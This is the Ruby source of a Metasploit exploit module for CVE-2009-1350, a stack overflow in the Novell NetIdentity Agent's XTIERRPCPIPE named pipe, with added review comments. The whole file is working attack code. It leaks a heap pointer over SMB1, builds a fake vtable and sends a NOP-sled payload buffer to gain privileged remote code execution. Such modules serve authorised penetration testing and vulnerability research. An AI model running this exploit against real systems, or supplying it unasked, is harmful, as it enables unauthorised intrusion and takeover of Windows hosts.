GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SMB::Client

  # Module metadata for CVE-2009-1350: a stack buffer overflow reachable
  # through the Novell NetIdentity Agent's \XTIERRPCPIPE named pipe.
  #
  # Notes for readers of the metadata below:
  # - 'Payload' allows 550 bytes and rejects NUL, whitespace and a handful of
  #   path/separator characters (see 'BadChars'); 'PrependEncoder' is a
  #   6-byte stack-alignment stub and 'StackAdjustment' moves ESP away from
  #   the overwritten frame before the payload runs.
  # - The single target's 'Ret' (0x41414141) is never read anywhere in this
  #   module; the addresses used by #exploit come from #mem_leak instead.
  # - 'Privileged' => true: the agent service runs with elevated rights, so a
  #   successful session is privileged (per the metadata; not verified here).
  # - 'SMB::ProtocolVersion' is deregistered because both #mem_leak and
  #   #exploit hard-code SMB1 via connect(versions: [1]).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending
          a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
          able to execute arbitrary code. The success of this module is much greater once the
          service has been restarted.
        },
        'Author' => [ 'MC', 'Ruben Santamarta' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2009-1350' ],
          [ 'OSVDB', '53351' ],
          [ 'BID', '34400' ],
          [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process', # only one shot!
        },
        'Payload' => {
          'Space' => 550,
          'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff",
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2009-04-06',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Both options are required and default to 'metasploit'; the 'fallbacks'
    # let the generic USERNAME/PASSWORD datastore keys satisfy them.
    register_options(
      [
        OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit'], fallbacks: ['USERNAME']),
        OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'], fallbacks: ['PASSWORD'])
      ]
    )

    # Only SMB1 is used by this module (connect(versions: [1]) below), so the
    # mixin's protocol-version option would be misleading if left exposed.
    deregister_options('SMB::ProtocolVersion')
  end

  # don't bother with this module for autoexploitation, it creates
  # false-positives on newer systems.
  def autofilter
    false
  end

  # First of two SMB sessions: authenticates, opens \XTIERRPCPIPE and sends a
  # 2048-byte request (two 4-byte headers plus 2040 random bytes) whose
  # response is expected to echo a heap pointer at offset 2060. Three further
  # addresses are derived from that pointer by fixed offsets.
  #
  # Returns [heap_pointer_leaked, object, method, shellcode] (four Integers)
  # on success, or nil if login or pipe creation fails (each early `return`
  # below is bare). The SMB connection is closed on every failure path but
  # NOT on the success path: only the pipe is closed there, and the caller
  # (#exploit) opens a fresh connection afterwards.
  #
  # Detection-relevant footprint: an SMB1 session setup, a named-pipe open for
  # \XTIERRPCPIPE, a ~2 KB write and a read of at least 2064 bytes.
  def mem_leak
    print_status("Connecting to the server...")
    connect(versions: [1])

    # NOTE(review): this writes the SMBPass value in clear text to the console
    # and any module log; masking it would avoid leaking credentials into logs.
    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")

    # NOTE(review): rescuing ::Exception also swallows Interrupt, SystemExit and
    # NoMemoryError; ::StandardError (or the SMB error classes) is the safer
    # choice. Same pattern in the second rescue here and in #exploit.
    begin
      smb_login()
    rescue ::Exception => e
      print_error("Error: #{e}")
      disconnect
      return
    end

    print_status("Connecting to named pipe \\XTIERRPCPIPE...")

    # If the pipe doesn't exist, bail.
    begin
      pipe = simple.create_pipe('\\XTIERRPCPIPE')
    rescue ::Exception => e
      print_error("Error: #{e}")
      disconnect
      return
    end

    # If we get this far, do the dance.
    fid = pipe.file_id

    # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
    # The return value is not used; the call is made for its effect on the
    # server side (presumably to bind state to this file id — TODO confirm).
    trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')

    # Send the first request to get our pointer.
    leak = [0x00000004].pack('V') + [0x00000818].pack('V')
    leak << rand_text_alpha_upper(2040)

    print_status("Sending malformed request...")
    pipe.write(leak)

    # NOTE(review): no length check on the response. If it is shorter than
    # 2060 bytes, String#[] returns nil and #unpack raises NoMethodError; if it
    # is 2060..2063 bytes, unpack('V') yields nil and `+ 0x700` below raises.
    # Either way a non-vulnerable or differently built agent surfaces as a
    # stack trace rather than a clean failure message.
    heap_pointer_leaked = pipe.read()[2060, 4].unpack('V')[0]
    print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))

    # The three addresses below are fixed offsets from the leaked pointer; the
    # offsets are hard-coded constants specific to the affected agent build.
    print_status("Building fake VTable...")
    object = heap_pointer_leaked + 0x700
    print_status(sprintf("Object: 0x%.8x", object))
    method = object + 0x30
    print_status(sprintf("Method: 0x%.8x", method))
    shellcode = method + 0xA0
    print_status(sprintf("Shellcode: 0x%.8x", shellcode))

    # Only the pipe is closed; the SMB connection itself is left to the caller.
    pipe.close

    return heap_pointer_leaked, object, method, shellcode
  end

  # Second SMB session: builds the trigger buffer from the addresses returned
  # by #mem_leak, reconnects, re-authenticates, reopens \XTIERRPCPIPE and
  # writes the buffer once, then hands off to the payload handler.
  def exploit
    heap_pointer_leaked, object, method, shellcode = mem_leak()

    # #mem_leak returns nil on every early exit, so all four locals are nil
    # here in that case; checking the last one covers all of them.
    return if not shellcode

    # Fixed layout: 16-byte header (with the object pointer in the third
    # slot), 240 filler bytes, 32 copies each of the three leaked-derived
    # pointers, 748 NOPs, the encoded payload (max 550 bytes per 'Space'),
    # and 110 trailing filler bytes. Total length is printed before the write.
    sploit = [0x00000002].pack('V')
    sploit << [0x00000000].pack('V')
    sploit << [object].pack('V')
    sploit << [0x00000000].pack('V')
    sploit << rand_text_alpha_upper(240)
    sploit << [object].pack('V') * 32
    sploit << [method].pack('V') * 32
    sploit << [shellcode].pack('V') * 32
    sploit << make_nops(748)
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(110)

    # Fresh SMB1 connection: #mem_leak closed its pipe but its connection is
    # simply abandoned, not reused.
    print_status("Connecting to the server...")
    connect(versions: [1])

    # NOTE(review): password is logged in clear text here as well.
    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")

    begin
      smb_login()
    rescue ::Exception => e
      print_error("Error: #{e}")
      disconnect
      return
    end

    print_status("Connecting to named pipe \\XTIERRPCPIPE...")

    # If the pipe doesn't exist, bail.
    begin
      pipe = simple.create_pipe('\\XTIERRPCPIPE')
    rescue ::Exception => e
      print_error("Error: #{e}")
      disconnect
      return
    end

    # ok, set up and send our exploit buffer...
    fid = pipe.file_id
    # Same Trans2 call as in #mem_leak; its return value is again unused.
    trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
    print_status("#{sploit.length} bytes written...")
    pipe.write(sploit)

    # 'EXITFUNC' => 'process' in the defaults: the service is expected not to
    # survive this, hence "only one shot" and the note in 'Description' about
    # success after a restart.
    handler
    disconnect
  end
end